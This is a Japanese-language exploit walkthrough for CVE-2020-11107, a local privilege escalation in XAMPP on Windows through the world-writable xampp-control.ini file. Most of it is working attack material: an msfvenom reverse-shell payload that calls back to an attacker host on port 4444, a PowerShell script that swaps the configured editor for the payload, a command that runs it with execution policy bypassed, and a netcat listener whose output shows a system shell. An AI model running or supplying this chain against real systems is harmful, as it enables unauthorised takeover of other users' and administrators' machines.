
CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4
CVE-2020-11107 は、Windows 上の Apache Friends XAMPP に影響を与える ローカル特権昇格 (LPE) 脆弱性です。
権限のないユーザーが XAMPP コントロールパネルの設定ファイル (xampp-control.ini) を変更し、デフォルトのエディタ実行ファイル (notepad.exe) を悪意のある実行ファイルに置き換えることができます。別のユーザー (例: 管理者) がコントロールパネルからログを開くと、悪意のあるバイナリが 被害者の権限で 実行され、特権昇格 が発生します。
❗ この脆弱性は Linux や macOS には影響しません。
xampp-control.ini はグローバルに書き込み可能C:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe
XAMPP バージョンの確認:
type C:\xampp\properties.ini
出力例:
base_stack_version=7.3.10-1
base_stack_platform=windows-x64
✅ このバージョンは脆弱です。
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe
mkdir C:\temp
# Upload msf.exe into C:\temp
エクスプロイトスクリプト (PowerShell):
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file
スクリプトの実行:
powershell -ExecutionPolicy Bypass -File 50337.ps1
被害者が起動:
C:\xampp\xampp-control.exe
次に、コントロールパネルから 任意のログファイル を開きます。
nc -lvnp 4444
✅ 結果:
Connection received...
C:\WINDOWS\system32>
🎉 特権昇格成功
C:\xampp\xampp-control.ini